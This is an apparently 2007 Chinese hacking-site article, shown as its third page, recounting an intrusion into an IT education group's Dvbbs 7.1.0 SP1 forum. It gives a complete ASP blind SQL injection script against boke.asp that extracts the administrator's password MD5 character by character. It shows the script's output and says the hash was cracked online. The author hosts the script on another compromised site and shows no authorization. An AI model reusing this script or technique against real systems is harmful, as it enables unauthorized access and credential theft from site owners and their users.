黑客风云——风云网络
设为首页 加入收藏 我要投稿 网站地图

您现在的位置: 黑客风云 >> 黑客文章 >> 黑客进阶 >> 脚本入侵 >> 正文
·完美空间提供500M免费AS04-10·企业安全之YY内网准入以04-09
·企业安全之意识与策略04-09·剑走偏锋:IIS漏洞利用04-09
·我来免费网提供100M免费04-09·1122mb.com提供20G超大免04-08
·映像劫持与反劫持技术04-07·让所有"暴力删除工具"无04-07
·入侵88red系统的详细过程04-07·Sql Injection脚本注入终04-07
·vbs+delphi 反弹后门生成04-07·飞讯网提供100MB免费PHP04-07
·突破SQL注入攻击时输入框04-04·结合内核和病毒技术的最04-04
·Real Player rmoc3260.d04-04·亿万网络今月最后为您提04-04
·php+mysql 5 sql inject04-03·Real Player rmoc3260.d04-03
·oblog文件下载漏洞04-03·免费啦提供1G-2G免费全能04-03
·完全解析网页后门和挂马04-02·一句话开3389(只测试过04-02
·萧萧免费空间网提供100M04-02·谷道免费空间网提供1G免04-01
·从本地入手解决双线路由03-31·sablog 1.6 多个跨站漏洞03-31
·富文本编辑器的跨站脚本03-31·Cookie注入是怎样产生的03-31
[组图]手工检测某天IT教育集团网站
      ★★★★★

手工检测某天IT教育集团网站

文章整理发布:黑客风云 文章来源:www.05112.com 更新时间:2007-11-29 16:34:20

 

看到有论坛,进去看眼吧!Powered By Dvbbs Version 7.1.0 Sp1 ,看到这个版本后心情豁然开朗,因为具自己所知该版本存在漏洞的说.

OK,现日了一个小站,用来放远程读取论坛管理员密码程序,通过踩点确定了路径该为http://www.51xxxxxxxxx.com/52network/boke.asp  而管理员大致确定为windecember ,谁叫看着这个名字熟悉那,(网站后台用户不就是他......) 嘿嘿,编辑程序远程读取吧!程序代码如下:

以下是引用片段:
<br><br>
<br><br>
<center>
<div align='left' style="width:500px;font-size:12px;">
<%
Server.ScriptTimeout=300
Response.Buffer = True
Dim hehefulsh
Dim charhex,OpenURL,templen,tempstr,newgetlen,theoffset,theURL,TheUser
Set hehefulsh = CreateObject("Microsoft.XMLHTTP")
charhex=Split("0,1,2,3,4,5,6,7,8,9,a,b,c,d,e,f",",")
tempstr=""

for total=0 to 15
for theoffset=0 to 15
templen=0
OpenURL="http://www.51xxxxxxxxx.com/52network/boke.asp?windecember'and'" & tempstr & charhex(theoffset) & "'=left(password," &total+1& ")and''='.index.html.index.html"
hehefulsh.Open "Get",OpenURL, False, "", ""
hehefulsh.Send
GetPage = BytesToBstr(hehefulsh.ResponseBody)
If InStr(GetPage,"该博客用户不存在或填写的资料有误!")=0 Then
tempstr=tempstr & charhex(theoffset)
response.write "前" & total+1 & "位MD5值为:" & tempstr & " 其他密码正在读取中,请等待。。。<BR>"
Response.Flush
Exit for
End if
Next
Next
response.write "<br><br><br>成功读取密码的MD5值,为:" & tempstr & " <BR><BR><BR>Amxking提醒:请不要使用本程序进行破坏行为!"
Set hehefulsh = Nothing
Function BytesToBstr(body)
dim objstream
set objstream = Server.CreateObject("adodb.stream")
objstream.Type = 1
objstream.Mode =3
objstream.Open
objstream.Write body
objstream.Position = 0
objstream.Type = 2
objstream.Charset = "GB2312"
BytesToBstr = objstream.ReadText
objstream.Close
set objstream = nothing
End Function
%>
</div>
</center>

保存在一个小站根目录下命名为ak.asp ,然后IE访问,读取.........

PS:严重鄙视Sun.Li这小子,风风火火的骂着闯进了群,说我不加他进,为了他进我现T了一个人才加进来.群满N久,换个人我容易吗我...黑封说的好:"开你毛会去吧...."哈哈 ,解气....

读取的结果出来了,比想象中快:

前1位MD5值为:a 其他密码正在读取中,请等待。。。
前2位MD5值为:ad 其他密码正在读取中,请等待。。。
前3位MD5值为:adc 其他密码正在读取中,请等待。。。
前4位MD5值为:adc9 其他密码正在读取中,请等待。。。
前5位MD5值为:adc98 其他密码正在读取中,请等待。。。
前6位MD5值为:adc989 其他密码正在读取中,请等待。。。
前7位MD5值为:adc9892 其他密码正在读取中,请等待。。。
前8位MD5值为:adc98924 其他密码正在读取中,请等待。。。
前9位MD5值为:adc98924f 其他密码正在读取中,请等待。。。
前10位MD5值为:adc98924f7 其他密码正在读取中,请等待。。。
前11位MD5值为:adc98924f7b 其他密码正在读取中,请等待。。。
前12位MD5值为:adc98924f7b6 其他密码正在读取中,请等待。。。
前13位MD5值为:adc98924f7b6b 其他密码正在读取中,请等待。。。
前14位MD5值为:adc98924f7b6be 其他密码正在读取中,请等待。。。
前15位MD5值为:adc98924f7b6beb 其他密码正在读取中,请等待。。。
前16位MD5值为:adc98924f7b6beb9 其他密码正在读取中,请等待。。。
成功读取密码的MD5值,为:adc98924f7b6beb9
 ok,再次丢给在线破MD5密码的站点查,结果证明了我本善良......希望以本篇文章警醒各网站负责人提高网络安全意识,普及网络安全技术.

上一页  [1] [2] [3] 

文章录入:cainiaowang    责任编辑:cainiaowang 
【字体: 】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口
VIP 专 区
Copyright @2006 黑客风云 ●业务联系:QQ 联系怪人 联系奇人 Email:给怪人发邮件 给奇人发邮件
ICP备案:冀06009886